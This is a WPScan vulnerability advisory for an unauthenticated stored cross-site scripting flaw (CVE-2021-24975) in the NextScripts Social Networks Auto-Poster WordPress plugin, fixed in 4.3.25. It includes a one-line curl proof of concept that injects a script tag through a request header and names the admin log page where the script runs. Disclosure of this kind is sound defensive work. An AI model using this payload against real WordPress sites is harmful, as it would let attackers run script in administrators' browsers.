WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

NextScripts: Social Networks Auto-Poster < 4.3.24 - Unauthenticated Stored XSS

Description

The plugin does not sanitise and escape logged requests before outputting them in the related admin dashboard, leading to an Unauthenticated Stored Cross-Site Scripting issue

Proof of Concept

curl -H 'x-tomato: <script>alert(/XSS/);</script>' 'https://example.com/?nxs-cronrun=yes'

The XSS will be triggered in the Log/History dashboard (/wp-admin/admin.php?page=nxs-log)

Affects Plugins

social-networks-auto-poster-facebook-twitter-g
Fixed in version 4.3.25

References

CVE
CVE-2021-24975
URL
https://plugins.trac.wordpress.org/changeset/2650138

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
b99dae3d-8230-4427-adc5-4ef9cbfb8ba1

Timeline

Publicly Published

2022-01-03 (about 9 months ago)

Added

2022-01-03 (about 9 months ago)

Last Updated

2022-04-08 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin